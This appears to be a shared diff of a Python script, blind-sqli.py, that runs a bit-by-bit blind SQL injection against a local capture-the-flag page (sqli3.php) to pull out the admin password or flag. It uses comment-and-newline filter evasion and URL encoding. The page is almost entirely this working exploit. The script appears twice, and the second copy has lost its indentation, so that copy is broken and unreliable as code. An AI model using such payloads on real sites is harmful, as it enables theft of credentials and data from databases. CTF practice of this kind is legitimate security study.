hyuunnn · August 1, 2024 11:00
diff --git a/blind-sqli.py b/blind-sqli.py
 import requests

 url = "http://localhost:9200/sqli3.php"

 flag = ""
 flag_len = 41
 for idx in range(1, flag_len):
    tmp = []
    for count in range(1, 9):
        payload = f"""a' = 'a'#
 and#
 userid = concat('ad','min')#
 and#
 substr( lpad(bin(ascii( substr(userpw, {'+'.join(["true"] * idx)}, true) )), {'+'.join(["true"] * 8)}, false), {'+'.join(["true"] * count)}, true ) = true#"""
        
        qqq = payload.replace("\n", "%0a").replace("#", "%23").replace("+", "%2b").replace(" ", "")

        r = requests.get(f"{url}?userid={qqq}&userpw=a").text
        if r.find("Hello") == 0:
            tmp.append("1")
        else:
            tmp.append("0")
            
    flag += chr(int(''.join(tmp), 2))
    print(flag)
    
    if flag[-1] == "}":
        break
	import requests

	url = "http://localhost:9200/sqli3.php"

	flag = ""
	flag_len = 41
	for idx in range(1, flag_len):
	tmp = []
	for count in range(1, 9):
	payload = f"""a' = 'a'#
	and#
	userid = concat('ad','min')#
	and#
	substr( lpad(bin(ascii( substr(userpw, {'+'.join(["true"] * idx)}, true) )), {'+'.join(["true"] * 8)}, false), {'+'.join(["true"] * count)}, true ) = true#"""

	qqq = payload.replace("\n", "%0a").replace("#", "%23").replace("+", "%2b").replace(" ", "")

	r = requests.get(f"{url}?userid={qqq}&userpw=a").text
	if r.find("Hello") == 0:
	tmp.append("1")
	else:
	tmp.append("0")

	flag += chr(int(''.join(tmp), 2))
	print(flag)

	if flag[-1] == "}":
	break